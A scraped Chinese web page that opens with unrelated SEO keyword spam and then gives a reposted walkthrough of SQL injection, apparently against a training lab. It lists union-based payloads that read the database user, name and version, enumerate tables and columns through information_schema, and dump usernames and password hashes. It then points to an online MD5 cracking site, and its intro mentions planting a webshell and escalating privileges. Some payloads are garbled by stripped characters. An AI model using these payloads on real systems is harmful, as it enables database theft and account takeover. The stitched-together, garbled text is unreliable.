网站建设需要注意哪些内容,杭州市临安区建设局网站,唐山网站建设zzvg,接推广网站SQL注入解题思路 寻找注入点#xff0c;可以通过web扫描工具实现通过注入点#xff0c;尝试得到连接数据库的用户名#xff0c;数据库名称#xff0c;权限等信息。猜解关键数据库表极其重要字段与内容。通过获得的用户信息寻找后台进行登录。利用后台上传webshell或一句话木… SQL注入解题思路 寻找注入点可以通过web扫描工具实现通过注入点尝试得到连接数据库的用户名数据库名称权限等信息。猜解关键数据库表极其重要字段与内容。通过获得的用户信息寻找后台进行登录。利用后台上传webshell或一句话木马进一步提权拿到服务器权限。 1.随便输入id 1,2,3…… 进行测试发现输入正确的ID会返回First name和Sumame信息输入错误的id不会返回信息 2.使用 1or11 遍历出数据库表中的所有内容。 3.此时我们可以通过使用user(),database(),version()三个内置函数使用 1 and 12 union select user(),database() -- 注意插入的命令的格式以及空格得到连接数据库的账户名数据库名称数据库版本信息。 4.猜测表名通过注入 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema database()# 5.猜测列名通过注入 1 union select 1,group_concat(column_name) from information_schema.columns where table_name users# 6.猜测用户密码通过注入 1 union select null,concat_ws(char(32,58,32),user,password) from users # 7.得到的用户后的字符串为哈希值可以登陆 https://cmd5.com/ 对MD5进行在线破解为明文密码。 转载于:https://www.cnblogs.com/Hunter-01001100/p/10975977.html
